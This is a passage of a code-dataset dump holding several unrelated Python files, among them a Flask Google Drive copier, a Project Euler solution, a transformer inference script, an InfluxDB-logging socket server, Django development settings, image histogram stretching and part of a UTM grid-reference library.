userinfo_response.json()[SUB]\n access_token = token_response.json()[ACCESS_TOKEN]\n\n # https://developers.google.com/identity/protocols/oauth2/openid-connect#refresh-tokens\n refresh_token = token_response.json().get(REFRESH_TOKEN, None)\n\n user = User.get(sub)\n if not user:\n user = User.create(sub, access_token=access_token, expires_at=expires_at, refresh_token=refresh_token)\n else:\n user = User.update_token(sub, access_token=access_token, expires_at=expires_at, refresh_token=refresh_token)\n\n session[SUB] = sub\n session[ACCESS_TOKEN] = access_token\n session[EXPIRES_AT] = expires_at\n\n if refresh_token:\n session[REFRESH_TOKEN] = refresh_token\n else:\n session[REFRESH_TOKEN] = user.refresh_token\n\n flask.session.permanent = True\n return redirect('/')\n\n\n@app.route('/token')\ndef token():\n response = {\n ACCESS_TOKEN: session[ACCESS_TOKEN]\n }\n return jsonify(response)\n\n\n@app.route('/signout')\ndef sign_out():\n session.pop(SUB, None)\n session.pop(ACCESS_TOKEN, None)\n session.pop(EXPIRES_AT, None)\n session.pop(REFRESH_TOKEN, None)\n return redirect(app.config['BASE_URI'], code=302)\n\n\n@app.route('/go', methods=['GET', 'POST'])\ndef go():\n \"\"\"\n Requests from users go here\n :return:\n \"\"\"\n if request.method == 'POST':\n # extract all details from user request\n json = request.get_json()\n public = json['public']\n links = json['links']\n folder_id = json['folderId']\n cred = Credentials(session[ACCESS_TOKEN])\n service = build('drive', 'v3', credentials=cred)\n\n # extract ids from links\n # match pattern is 25 words or dash characters, might change this later\n pattern = '[-\\w]{25,}'\n file_ids = extractIds(pattern, links)\n\n response_body = dict()\n response_body['response'] = []\n\n c = Copier(service)\n\n response_body['response'] = c.make_copies(file_ids, public=public, destination=folder_id)\n return jsonify(response_body), 200\n\n else:\n # fun\n message = {'greeting': 'Hello boss'}\n return jsonify(message)\n\n\nif __name__ == \"__main__\":\n app.run(host='localhost', ssl_context=\"adhoc\")\n","repo_name":"echen44/drive-copier","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6779,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"31894526573","text":"# The fraction 49/98 is a curious fraction,\n# as an inexperienced mathematician, in attempting to simplify it, may incorrectly believe that\n# 49/98 = 4/9 which is correct, is obtained by cancelling the 9s.\n#\n# We shall consider fractions like,\n# 30/50 = 3/5\n# to be trivial examples.\n#\n# There are exactly four non-trivial examples of this type of fraction,\n# less than one in value, and containing two digits in the numerator and denominator.\n#\n# If the product of these four fractions is given in its lowest common terms, find the value of the denominator.\nfrom fractions import Fraction\nfrom functools import reduce\n\ndef badSimplify(numerator: int, denominator: int) -> list[Fraction]:\n if numerator %10 == 0 or denominator % 10 == 0: return []\n\n numerator = str(numerator)\n denominator = str(denominator)\n acc = []\n\n if numerator[0] == denominator[0]:\n candidate = (int(numerator[1]), int(denominator[1]))\n if candidate not in acc:\n acc.append(candidate)\n\n if numerator[1] == denominator[0]:\n candidate = (int(numerator[0]), int(denominator[1]))\n if candidate not in acc:\n acc.append(candidate)\n\n if numerator[0] == denominator[1]:\n candidate = (int(numerator[1]), int(denominator[0]))\n if candidate not in acc:\n acc.append(candidate)\n\n if numerator[1] == denominator[1]:\n candidate = (int(numerator[0]), int(denominator[0]))\n if candidate not in acc:\n acc.append(candidate)\n\n return acc\n\n\nif __name__ == '__main__':\n acc = []\n for n in range(11, 100):\n for d in range(n, 100):\n if n == d: continue\n BS = badSimplify(n, d)\n for badFraction in BS:\n if Fraction(badFraction[0], badFraction[1]) == Fraction(n, d):\n acc.append((n,d))\n\n # visual inspection of the result shows we have a floating point error, but the result is 0.01 ... 2,\n # which I interpret as 1/100\n print(reduce((lambda a,b:a*b) , [n/d for (n,d) in acc]))\n\n","repo_name":"jarredblanchette/ProjectEuler","sub_path":"problems/033/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30721035599","text":"# Approach 1\n# O(N2), O(1)\ndef maxLen(self, n, arr):\n max_len = 0\n for i in range(n):\n sum = 0\n for j in range(i, n):\n sum += arr[j]\n if sum == 0:\n max_len = max(max_len, j-i+1)\n return max_len\n\n\n# Approach 2\n# O(N), O(N)\ndef maxLen(self, n, arr):\n # Storing prefix sum and the index is the important factor here\n prefix_sum = dict()\n max_len, curr_sum = 0, 0\n for i in range(n):\n curr_sum += arr[i]\n if curr_sum == 0:\n max_len = max(max_len, i+1)\n if curr_sum not in prefix_sum.keys():\n prefix_sum[curr_sum] = i\n else:\n max_len = max(max_len, i-prefix_sum[curr_sum])\n return max_len","repo_name":"nikhiljsk/Strivers_SDE_Sheet","sub_path":"04_Arrays_Part_Four/4.4_Largest_Subarray_with_Sum_0.py","file_name":"4.4_Largest_Subarray_with_Sum_0.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"5607491592","text":"from tokenizer import Tokenizer\nfrom models import TransformerDecoderLightning\nfrom dataloader import TextDataset, Collator\nfrom torch.utils.data import DataLoader\nimport lightning.pytorch as pl\nimport torch\nimport os\nimport sentencepiece as spm\n\n\nsp = spm.SentencePieceProcessor()\nsp.Load('spms/spm_1024.model')\nckpt = '/Users/rachel/PycharmProjects/lightning_logs/version_8/checkpoints/epoch=11-step=20160.ckpt'\n\n\n# # Create the model\n# model = TransformerDecoderLightning(num_tokens=my_tokenizer.num_tokens,\n# ignore_index=-1)\n\nmodel = TransformerDecoderLightning.load_from_checkpoint(ckpt,\n num_tokens=len(sp),\n per_head_dim=256,\n num_heads=2,\n num_layers=2,\n )\nmodel.eval()\nprompt = sp.encode('When was the last time ')\nprompt = [sp.piece_to_id('')] + prompt\nprompt = torch.tensor(prompt).to(torch.long).unsqueeze(0)\nfor i in range(200):\n next_token = model.infer_step(prompt, top_k=3)\n prompt = torch.cat( [prompt,\n torch.tensor([next_token]).to(torch.long).unsqueeze(0)],\n dim=-1)\n text = [sp.decode(prompt[0].numpy().tolist())]\n if next_token == sp.piece_to_id(''):\n break\nprint(text)\n","repo_name":"gokce-keskin/Transformer","sub_path":"src/infer_transformer.py","file_name":"infer_transformer.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42876508064","text":"# Servidor HTTP\n\nimport socket\nimport requests\nimport json\nfrom influxdb import InfluxDBClient\nfrom datetime import datetime\nfrom pytz import timezone\nimport traceback\nfrom numpy import random as rnd\n\ns=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ndevice_list = [\"0001\", \"0002\", \"0003\"]\n\nclient = InfluxDBClient(host=\"localhost\", port=8086)\ntry:\n\t# client.create_database(\"lora_db\")\n\t# client.get_list_database() \n\tclient.switch_database(\"lora_db\")\nexcept:\n\tprint(\"Exepction!!\")\n\n#la ip es local host y se especifica con dos comillas '' (por defecto localhost)\ns.bind(('',22404))\n\ns.listen(10) #numero máximo de peticiones simultáneas para el servidor\n\n\ntry:\n\twhile 1:\n\t\tprint(\"esperando a recibir dato\")\n\t\tconn, addr=s.accept()\n\t\tprint(\"dato recibido\")\n\t\tprint(\"\\n\")\n\t\thead=conn.recv(1024) #Obtenemos los datos de cabecera en formato bytes\n\t\t# print(head)\n\n\t\tbody=conn.recv(1024) #Obtenemosv el payload del mensaje en formato bytes\n\t\t# print(body)\n\t\tdata = body.decode('utf-8')\n\t\tprint(data)\n\n\t\tdevice = rnd.choice(device_list)\n\t\t# data = data.split(\"&\")\n\t\t# print(data)\n\t\t# data = dict([i.split(\"=\") for i in data])\n\t\t# data['temperature'] = int(data['temperature'])\n\t\t# data['humidity'] = int(data['humidity'])\n\t\t# print(data)\n\t\ttime_zone = timezone('America/Santiago')\n\t\ttime = datetime.now(time_zone)\n\n\t\tbody_json = [\n\t\t\t{\n\t\t\t\"measurement\": \"device_\" + \"0003\",\n\t\t\t\"tags\": {\n\t\t\t\t\"host\": \"Oleksandr\",\n\t\t\t\t\"region\": \"Murcia\"\n\t\t\t},\n\t\t\t\"time\": time,\n\t\t\t\"fields\": json.loads(data)\n\t\t\t}]\n\t\tprint(body_json)\n\t\tclient.write_points(body_json)\n\n\n\t\t#ENVIAMOS RESPUESTA AL SERVIDOR\n\t\t#es obligatorio enviar una respuesta ya que el cliente se queda bloqueado esperandola\n\t\tr_protocol='HTTP/1.1'.encode()\n\t\tr_status='200'.encode()\n\t\tr_status_text='OK'.encode()\n\t\tconn.send(b'%s %s %s' %(r_protocol, r_status, r_status_text))\n\t\tprint(\"Sent\")\n\n\t\tconn.close() #cierre de la comunicacion\n\n\nexcept:\n\tprint(\"Ha ocurrido una excepcion\")\n\nfinally:\n\tconn.close()\n\ts.close()\n\n","repo_name":"Kovaxs/LoRa_IoT","sub_path":"servidores LoRa_20_21/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"67164807","text":"import numpy as np\nfrom scipy.signal import convolve2d\nfrom matplotlib import cm\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nfrom matplotlib.ticker import AutoMinorLocator\n\nfrom mpl_toolkits.mplot3d import Axes3D\n\nW=10\nH=10\nD=5\n\nlim=np.array([W,D,H])\n\nm=np.zeros(lim)\n\nenv=np.zeros(lim)\nenv[3,1:3,3 ]=1\nenv[4,1:3,2:5]=1\nenv[5,1:3,0:5]=1\nenv[6,1:3,0:5]=1\nenv[7,1:3,2:5]=1\nenv[4:9,:2,6:8]=1\n\ndef sense(p):\n global env\n return env[tuple(p)]>0\n\nsq2=np.sqrt(2)/2\n# dkernel=np.array([[.7,.7/sq2,.7],[.7/sq2, 0, .7/sq2],[.7, .7/sq2, .7]])\ndkernel=np.array([[0,.7/sq2,0],[.7/sq2, 0, .7/sq2],[0, .7/sq2, 0]])\n\n\ndef dact(act, ext):\n conv=convolve2d(np.maximum(act,0), dkernel, 'same') / convolve2d(np.ones_like(activity), dkernel,'same')\n neg_distr=convolve2d(np.minimum(act,0), dkernel, 'same')\n \n return -A*act \\\n +(B-act)*(conv + np.maximum(ext_input,0)) \\\n -(D+act)*(np.maximum(-ext_input,0))\n\n\nctublue=[0,110/255,182/255]\nctuorange=[1,115/255,63/255]\n\n\ndef plot_3d():\n fig = plt.figure(figsize=(6,6))\n ax = fig.add_subplot(111, projection='3d', aspect='equal')\n\n plt.xticks(np.arange(W))\n plt.yticks(np.arange(5))\n ax.set_xlim(-0.5,9.5)\n ax.set_ylim(-0.5,9.5)\n ax.set_zlim(-0.5,9.5)\n ax.xaxis.set_minor_locator(AutoMinorLocator(2))\n ax.yaxis.set_minor_locator(AutoMinorLocator(2))\n ax.grid(True, which='minor')\n\n \n # for tick in ax.axes.get_xticklines():\n # tick.set_visible(False)\n\n # for tick in ax.axes.get_yticklines():\n # tick.set_visible(False)\n\n ax.plot3D(path[:,0], path[:,1], path[:,2], color=ctuorange, lw=2)\n ax.scatter(*np.where(env==1), s=400, color=ctublue, alpha=1)\n\n for warp in warps:\n ax.plot3D(path[warp-1:warp+1,0], path[warp-1:warp+1,1], path[warp-1:warp+1,2], 'k', lw=2)\n\n plt.axis('equal')\n ax.autoscale()\n \n plt.tight_layout()\n\n# plot_3d()\n\n\ndef plot_2d_env():\n # rects=[]\n # for i in range(10):\n # for j in range(10):\n # if env[i,y,j]==1:\n # rects.append(patches.Rectangle([i-0.5,j-0.5], 1, 1, color=ctublue, alpha=1))\n\n fig = plt.figure(figsize=(6,6))\n ax = fig.add_subplot(111, aspect='equal')\n\n plt.xticks(np.arange(W+1))\n plt.yticks(np.arange(H+1))\n plt.axis('scaled')\n ax.set_xlim(-0.5,9.5)\n ax.set_ylim(-0.5,9.5)\n ax.xaxis.set_minor_locator(AutoMinorLocator(2))\n ax.yaxis.set_minor_locator(AutoMinorLocator(2))\n ax.grid(True, which='minor')\n\n \n for tick in ax.axes.get_xticklines():\n tick.set_visible(False)\n\n for tick in ax.axes.get_yticklines():\n tick.set_visible(False)\n\n # for r in rects:\n # ax.add_patch(r)\n\n # plot path\n im=ax.imshow(activity.T, interpolation=\"nearest\", cmap=\"viridis\")\n \n p0=path[path[:,1]==y,:]\n plen=np.sum(np.sqrt(np.sum((p0[1:,:]-p0[:-1,:])**2, axis=1)))\n print(\"Path length:\",plen)\n # p0+=np.random.rand(p0.shape[0], 3)/4 - (1/8)\n ax.plot(p0[:,0], p0[:,2], lw=2, color=ctuorange)\n\n for warp in warps:\n plt.plot(p0[warp-1:warp+1,0], p0[warp-1:warp+1,2], 'k', lw=2)\n\n plt.colorbar(im)\n \n plt.tight_layout()\n\n\n\n\nA=50\nB=2\nD=1\nE=100\nC=0.00\n\nSTEP=0.005\n\n\npos=np.zeros((3,), 'i')\nneigh=np.array([[-1,0,0], [1,0,0], [0,0,-1], [0,0,1]], 'i')\n\npath=np.zeros((0,3))\n\nturn_values=[.5, 0, 1]\n\nrects=[]\n\nplt.interactive(True)\n\nfig = plt.figure()\nax = fig.add_subplot(111)\n\nplt.xticks(np.arange(W+1))\nplt.yticks(np.arange(H+1))\nplt.axis('equal')\nax.set_xlim(0,10)\nax.set_ylim(0,10)\nax.xaxis.set_minor_locator(AutoMinorLocator(2))\nax.yaxis.set_minor_locator(AutoMinorLocator(2))\nax.grid(True, which='minor')\n\n\n# plt.show()\n\n\ndef draw():\n ax.clear()\n ax.imshow(activity.T, interpolation=\"none\", cmap=\"viridis\")\n ax.grid(True, which='minor')\n for pa in rects:\n ax.add_patch(pa)\n p0=path[path[:,1]==y,:]\n plen=np.sum(np.sqrt(np.sum((p0[1:,:]-p0[:-1,:])**2, axis=1)))\n plt.title(plen)\n p0+=np.random.rand(p0.shape[0], 3)/4-0.25\n ax.plot(p0[:,0], p0[:,2])\n \n for warp in warps:\n plt.plot(p0[warp-1:warp+1,0], p0[warp-1:warp+1,2], 'r')\n\n plt.axis(\"equal\")\n fig.canvas.draw()\n\nwarps=[]\n# explore\nfor y in range(5):\n pos[1]=y\n activity=np.zeros((W,H))\n ext_input=np.ones((W,H))*E\n\n # a few steps to stabilize the initial state\n for i in range(10):\n k1=dact(activity, ext_input)\n k2=dact(activity + (STEP/2)*k1, ext_input)\n k3=dact(activity + (STEP/2)*k2, ext_input)\n k4=dact(activity+STEP*k3, ext_input)\n \n activity+=STEP/6 * (k1 + 2*k2 + 2*k3 + k4)\n print(activity)\n\n step=None\n \n while True:\n while True:\n print(\"At\",pos)\n path=np.vstack((path, pos))\n \n if sense(pos): # position full\n print(\"full\")\n m[tuple(pos)]=-2\n ext_input[tuple(pos[::2])]=-E\n \n rects.append(patches.Rectangle(pos[::2]-0.5, 1, 1, color='g', alpha=0.5))\n if step is not None:\n pos-=step\n else:\n break\n continue\n\n m[tuple(pos)]=-1\n ext_input[tuple(pos[::2])]=0\n\n for i in range(5):\n k1=dact(activity, ext_input)\n k2=dact(activity + (STEP/2)*k1, ext_input)\n k3=dact(activity + (STEP/2)*k2, ext_input)\n k4=dact(activity + STEP*k3, ext_input)\n\n activity+=STEP/6 * (k1 + 2*k2 + 2*k3 + k4)\n\n draw()\n # input()\n \n maxd=activity[tuple(pos[::2])]\n prev_step=step\n step=None\n for d in neigh:\n nextpos=pos+d\n if (nextpos<0).any() or (nextpos>=lim).any():\n continue\n\n nextpos=tuple(nextpos[::2])\n dir_contrib = turn_values[np.sum(d==prev_step)-1] if prev_step is not None else 0\n next_val=activity[nextpos] + C*dir_contrib\n\n if next_val>maxd:\n maxd=next_val\n step=d\n\n if step is not None:\n pos+=step\n else:\n break\n \n if (m[:,y,:]>=0).any():\n print(\"deadlock, just wait\",pos)\n ukno=np.vstack(np.where(m[:,y,:] >= 0))\n mdist=ukno-pos[::2,np.newaxis]\n edist=np.sqrt(np.sum(mdist**2, axis=0))\n\n closest=np.argmin(edist)\n \n # TODO: how to go\n pos=np.array([ukno[0,closest], y, ukno[1,closest]])\n\n print(\"warp to\",pos)\n warps.append(path.shape[0])\n else:\n break\n","repo_name":"MartinBurian/diploma-thesis","sub_path":"cd/expl_neuro.py","file_name":"expl_neuro.py","file_ext":"py","file_size_in_byte":6698,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"41549662872","text":"import random\nimport statistics\ny = []\nfor i in range(20):\n\tx = random.randint(6,100)\n\ty.append((2*x)+3) \n\tprint(x,y[i])\n\nstddev = statistics.stdev(y)\nprint(\"Standard Deviation\",stddev)","repo_name":"PranavParameshwaran/Big-Data","sub_path":"Lab 1/Q3.py","file_name":"Q3.py","file_ext":"py","file_size_in_byte":185,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18548696823","text":"# -*- coding: utf-8 -*-\n\nimport re,urlparse\nfrom resources.lib.libraries import client\nfrom resources.lib.libraries import jsunpack\n\n\ndef resolve(url):\n try:\n result = client.request(url)\n\n result = re.compile('(eval.*?\\)\\)\\))').findall(result)[-1]\n result = jsunpack.unpack(result)\n\n url = client.parseDOM(result, 'embed', ret='src')\n url += re.compile(\"file *: *[\\'|\\\"](.+?)[\\'|\\\"]\").findall(result)\n url = [i for i in url if not i.endswith('.srt')]\n url = 'http://' + url[0].split('://', 1)[-1]\n\n url = url.replace(':%s' % urlparse.urlparse(url).port, '')\n\n return url\n except:\n return\n\n","repo_name":"mpie/repo","sub_path":"plugin.video.doofree_old/resources/lib/resolvers/tusfiles.py","file_name":"tusfiles.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35960079531","text":"\"\"\"Development Settings\n\nAdds sensible defaults for developement of project\n- Enable DEBUG\n- Log outgoing emails to console\n- Enable Django Extensions\n- Enable Django Debug Toolbar\n- Use local caches\n- Enable livereloading\n\"\"\"\n\nfrom .common import * # noqa F405\nfrom .common import INSTALLED_APPS, env\n\n# DEBUG\n# ------------------------------------------------------------------------------\nDEBUG = env.bool('DJANGO_DEBUG', default=True)\nTEMPLATES[0]['OPTIONS']['debug'] = DEBUG # noqa: F405\n\nINTERNAL_IPS = ('127.0.0.1', '192.168.33.12', )\n\nALLOWED_HOSTS = ['*']\n\n\n# SECRET CONFIGURATION\n# ------------------------------------------------------------------------------\n# A secret key for this particular Django installation. Used in secret-key\n# hashing algorithms. Set this in your settings, or Django will complain\n# loudly.\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key\n# Note: This key only used for development and testing.\nSECRET_KEY = env(\"DJANGO_SECRET_KEY\", default='CHANGEME!!!')\n\n# cors\n# --------------------------------------------------------------------------\nCORS_ORIGIN_WHITELIST = env.list('CORS_ORIGIN_WHITELIST', default=['http://localhost', 'http://localhost:8000'])\n\n# Mail settings\n# ------------------------------------------------------------------------------\nEMAIL_HOST = 'localhost'\nEMAIL_PORT = 1025\nEMAIL_BACKEND = env('DJANGO_EMAIL_BACKEND',\n default='django.core.mail.backends.console.EmailBackend')\n\n# CACHES\n# ------------------------------------------------------------------------------\nCACHES = {\n 'default': {\n 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',\n 'LOCATION': ''\n }\n}\n\n# django-extensions (http://django-extensions.readthedocs.org/)\n# ------------------------------------------------------------------------------\nINSTALLED_APPS += ('django_extensions', )\n\n# LiveReload Support with devrecargar\n# ------------------------------------------------------------------------------\n# https://github.com/scottwoodall/django-devrecargar\nINSTALLED_APPS += ('devrecargar',)\n\nDEVRECARGAR_PATHS_TO_WATCH = [{\n 'path': str(APPS_DIR), # noqa: F405\n 'patterns': ['*.html', '*.js', '*.css', '*.scss'],\n}]\n\n# django-debug-toolbar\n# ------------------------------------------------------------------------------\nMIDDLEWARE += ['debug_toolbar.middleware.DebugToolbarMiddleware', ] # noqa: F405\nINSTALLED_APPS += ('debug_toolbar', )\n\nDEBUG_TOOLBAR_CONFIG = {\n 'DISABLE_PANELS': ['debug_toolbar.panels.redirects.RedirectsPanel', ],\n 'SHOW_TEMPLATE_CONTEXT': True,\n}\n\nDDF_DEFAULT_DATA_FIXTURE = 'nexus.base.utils.dynamic_fixture_utils.PatchedSequentialDataFixture'\n\n# This will expose all browsable api urls. For dev the default value is true\nAPI_DEBUG = env.bool('API_DEBUG', default=True)\n\n# MEDIA CONFIGURATION\n# ------------------------------------------------------------------------------\n\n# Media configuration to support deployment of media files while is debug=True or development.\nMEDIA_URL = env(\"MEDIA_URL\", default=\"/media/\")\n","repo_name":"CuriousLearner/nexus","sub_path":"settings/development.py","file_name":"development.py","file_ext":"py","file_size_in_byte":3060,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"42814342097","text":"# ——————————————————————————— 左右两边选取参数进行拉伸 mode/std and 0.95%/t_n ——————————————————————————————————\n\nimport math\nimport numpy as np\nfrom stretchRange import stretchrange\n\npi = math.pi\ne = math.e\n\n\n# lamda和k分别是什么?\ndef global_stretching(r_array, height, width, lamda, k):\n\n length = height * width\n R_rray = []\n for i in range(height):\n for j in range(width):\n # 整个图像的像素值按照行先序排成一个数组\n R_rray.append(r_array[i][j])\n # 图像像素值升序排列\n R_rray.sort()\n\n # 去掉前0.5%\n I_min = R_rray[int(length / 200)]\n # 去掉后0.5%\n I_max = R_rray[-int(length / 200)]\n\n array_Global_histogram_stretching = np.zeros((height, width))\n d = 4\n\n # 最常出现的像素值为mode,像素值最初出现位置的0.5%为SR_min,右侧对应的位置为SR_max\n SR_min, SR_max, mode = stretchrange(R_rray, height, width)\n # 自己加的\n # I_max = SR_max\n # 自己加的\n # I_min = SR_min\n\n # O_lamda_min\n DR_min = (1 - 0.655) * mode\n # t_lamda_x\n t_n = lamda ** d\n\n # miu_lamda的左右范围\n O_max_left = SR_max * t_n * k / mode\n O_max_right = 255 * t_n * k / mode\n # miu_lamda的左右区间\n Dif = O_max_right - O_max_left\n # if Dif >= 1.526:\n if Dif >= 1:\n sum = 0\n # for i in range(2, int(Dif + 1)):\n for i in range(1, int(Dif + 1)):\n # sum = sum + ((i - 1.526) * 0.665 * mode + mode) / (t_n * k)\n sum = sum + (1.526 + i) * mode / (t_n * k)\n # O_lamda_max\n DR_max = sum / int(Dif)\n\n for i in range(0, height):\n for j in range(0, width):\n if r_array[i][j] < I_min:\n\n p_out = (r_array[i][j] - I_min) * (DR_min / I_min) + I_min\n array_Global_histogram_stretching[i][j] = p_out\n elif r_array[i][j] > I_max:\n p_out = (r_array[i][j] - DR_max) * (DR_max / I_max) + I_max\n array_Global_histogram_stretching[i][j] = p_out\n else:\n p_out = int((r_array[i][j] - I_min) * ((255 - I_min) / (I_max - I_min))) + I_min\n array_Global_histogram_stretching[i][j] = p_out\n else:\n\n if r_array[i][j] < I_min:\n\n p_out = (r_array[i][j] - np.min(r_array)) * (DR_min / np.min(r_array)) + np.min(r_array)\n array_Global_histogram_stretching[i][j] = p_out\n else:\n p_out = int((r_array[i][j] - I_min) * ((255 - DR_min) / (I_max - I_min))) + DR_min\n array_Global_histogram_stretching[i][j] = p_out\n\n return array_Global_histogram_stretching\n\n\ndef RelativeGHstretching(sceneRadiance, height, width):\n # blue lamda推荐的范围为0.95——0.99\n sceneRadiance[:, :, 0] = global_stretching(sceneRadiance[:, :, 0], height, width, 0.97, 1.25)\n # green lamda推荐的范围为0.93——0.97\n sceneRadiance[:, :, 1] = global_stretching(sceneRadiance[:, :, 1], height, width, 0.95, 1.25)\n # red lamda推荐的范围为0.8——0.85\n sceneRadiance[:, :, 2] = global_stretching(sceneRadiance[:, :, 2], height, width, 0.83, 0.85)\n return sceneRadiance\n","repo_name":"Cinderella1001/Liver_Classfication_and_enhancement-main","sub_path":"RGHS/relativeglobalhistogramstretching.py","file_name":"relativeglobalhistogramstretching.py","file_ext":"py","file_size_in_byte":3338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17765371450","text":"import pyproj\n\nimport pyutm.data as data\nimport pyutm.locate as locate\n\n\nclass Grid:\n \"\"\"\n This class serves as the API for pyutm, with three main public methods: write_refs(), write_uids() and write_utms().\n \"\"\"\n def __init__(self, data, columns=None, epsg=4326):\n \"\"\"\n Validates, loads and optionally transforms the input data. Assumes coordinates are in EPSG:4326.\n :param data: list or string, data or file path to data\n :param columns: tuple or list of length 2, default=None, column names containing X and Y coordinates,\n in that order\n :param epsg: int, default=4326, European Petroleum Survey Group number for the input coordinate system\n \"\"\"\n self._input_data = data\n self._input_columns = columns\n self._input_datatype = None\n self._shape_type = None\n self._data = None\n self._columns = None\n self._epsg = epsg\n self._error_message = None\n\n # Load data\n self._set_columns()\n self._set_data()\n # Transform coordinates to EPSG 4326, if necessary\n if self._epsg != 4326:\n self._transform_coords()\n\n if self._error_message:\n self._error(self._error_message)\n\n def _set_columns(self):\n \"\"\"\n Validates the columns parameter: only tuples and lists of length 2 are considered valid.\n An invalid columns parameter defaults to None.\n \"\"\"\n if isinstance(self._input_columns, (tuple, list)):\n if len(self._input_columns) == 2:\n self._columns = tuple(self._input_columns)\n else:\n self._columns = None\n\n def _set_data(self):\n \"\"\"\n Loads the data based on type. 0: tuple or list, 1: CSV, or 2: SHP file.\n \"\"\"\n # Tuples or lists must contain at least two elements\n if isinstance(self._input_data, (tuple, list)) and (len(self._input_data) > 1):\n self._input_datatype = 0\n self._data, self._error_message = data.from_list(self._input_data)\n else:\n try:\n if self._input_data.endswith('.csv') and self._columns:\n self._input_datatype = 1\n self._data, self._error_message = data.from_csv(self._input_data, self._columns)\n elif self._input_data.endswith('.shp'):\n self._input_datatype = 2\n self._data, self._shape_type, self._error_message = data.from_shp(self._input_data)\n # Everything else raises an error\n else:\n raise AttributeError\n except AttributeError:\n self._error_message = 'Invalid parameter(s): Grid(data={}, columns={}, epsg={})'.format(\n repr(self._input_data), repr(self._input_columns), self._epsg)\n\n def _transform_coords(self):\n \"\"\"\n Reprojects coordinates into longitude and latitude.\n \"\"\"\n try:\n p = pyproj.Proj(init='epsg:{}'.format(self._epsg))\n self._data[0], self._data[1] = p(self._data[0].values, self._data[1].values, inverse=True)\n except RuntimeError:\n self._error_message = 'EPSG:{} not found'.format(self._epsg)\n\n def _get_grid_refs(self, column, precision):\n \"\"\"\n Uses the locate module to compute a grid reference for every value in the input data.\n :param column: string, column name of the grid references\n :param precision: int, desired precision of the grid references\n \"\"\"\n try:\n self._data[column] = [locate.Point(coord[0], coord[1], precision).grid_ref for coord in self._data.values]\n except (KeyError, ValueError):\n self._error('Invalid column name')\n\n def _get_uids(self, grid_refs, column, prefix, prefix_column, gzd, k100, delimiter):\n \"\"\"\n Uses the locate module to compute a Unique ID (UID) for every value in the input data.\n :param grid_refs: dataframe, grid references to be modified\n :param column: string, column name of the UIDs\n :param prefix: string, characters added to the beginning of the UIDs\n :param prefix_column: Pandas Series, column name containing prefix values for the UIDs\n :param gzd: whether the Grid Zone Designation should be included in the UIDs\n :param k100: boolean, whether the 100k meter grid reference should be included in the UIDs\n :param delimiter: string, delimiter of the UIDs\n \"\"\"\n if grid_refs.any():\n self._data[column] = locate.UID(grid_refs, prefix, prefix_column, gzd, k100, delimiter).uids\n else:\n self._data[column] = None\n\n def _get_utm_coords(self, column):\n \"\"\"\n Uses the locate module to compute a UTM coordinate for every value in the input data.\n :param column: string, column name of the UTM coordinates\n \"\"\"\n try:\n self._data[column] = [locate.Point(coord[0], coord[1]).utm_coord for coord in self._data.values]\n except (KeyError, ValueError):\n self._error('Invalid column name')\n\n def _get_prefix_column(self, prefix_column):\n \"\"\"\n Uses the data module to retrieve prefix values if stored in the original data file.\n :param prefix_column: string or list, column name containing prefix values for the UID\n \"\"\"\n try:\n prefixes = None\n # If input was a string, wrap it in a list\n if isinstance(prefix_column, str):\n prefix_column = [prefix_column]\n # Get column data from the original data files\n if self._input_datatype == 1:\n prefixes, error_message = data.from_csv(self._input_data, prefix_column, prefix=True)\n elif self._input_datatype == 2:\n prefixes, shape_type, error_message = data.from_shp(self._input_data, prefix_column)\n else:\n return prefixes\n # Call the error function directly if something went wrong\n if error_message:\n self._error(error_message)\n else:\n return prefixes.iloc[:, 0]\n except (KeyError, ValueError, AttributeError):\n self._error('Invalid column name')\n\n def _write_data(self, fname, column, uid=False):\n \"\"\"\n Uses the data module to write data to a list or file, based on the data type.\n Always returns a nested list of the computed data.\n :param fname: string, file name of the output data\n :param column: string, column name for the data\n :return: list, nested list in [X, Y, data] format\n \"\"\"\n if self._input_datatype == 1:\n data.to_csv(fname, column, self._input_data, self._data)\n elif self._input_datatype == 2:\n data.to_shp(fname, column, self._input_data, self._data, self._shape_type, uid)\n return data.to_list(self._data, column)\n\n def write_refs(self, fname=None, column='GRID_REF', precision=10):\n \"\"\"\n Gets the grid references for a set of points and writes them to the specified file,\n then returns a nested list of the coordinates and their grid references.\n If no file name is given, returns a nested list without writing to a file.\n :param fname: string, default=None, file name for the output data\n :param column: string, default='GRID_REF', column name for the grid references\n :param precision: int, default=10, desired precision of the grid references\n :return: list, nested list in [X, Y, grid reference] format\n \"\"\"\n self._get_grid_refs(column, precision)\n return self._write_data(fname, column)\n\n def write_uids(self, fname=None, column='UID_REF', precision=10, prefix=None, prefix_column=None, gzd=True,\n k100=True, delimiter='-'):\n \"\"\"\n Gets the Unique IDs (UID) for a set of points and writes them to the specified file,\n then returns a nested list of the coordinates and their UID.\n If no file name is given, returns a nested list without writing to a file.\n :param fname: string, default=None, file name for the output data\n :param column: string, default='UID_REF', column name for the UIDs\n :param precision: int, default=10, desired precision of the UIDs\n :param prefix: string, default=None, characters added to the beginning of the UIDs\n :param prefix_column: Pandas 